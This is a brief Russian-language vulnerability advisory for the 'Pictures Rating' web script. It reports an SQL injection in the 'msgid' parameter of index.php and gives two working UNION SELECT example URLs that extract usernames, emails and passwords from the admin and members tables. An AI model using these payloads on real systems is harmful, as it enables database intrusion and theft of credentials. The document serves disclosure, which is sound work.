Программа: Pictures Rating

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «msgid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://server.com/Script_Dir/index.php?cmd=8&msgid=52/* */UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username, 0x3a,password,0x3c623e),5,6,7/* */FROM/**/admin/*

http://server.com/Script_Dir/index.php?cmd=8&msgid=52/* */UNION/**/ALL/**/SELECt/**/1,2,@ @version,concat(0x3c623e,username,0x3a,email, 0x3a,password,0x3c623e),5,6,7/* */FROM/**/members/*



Оставить мнение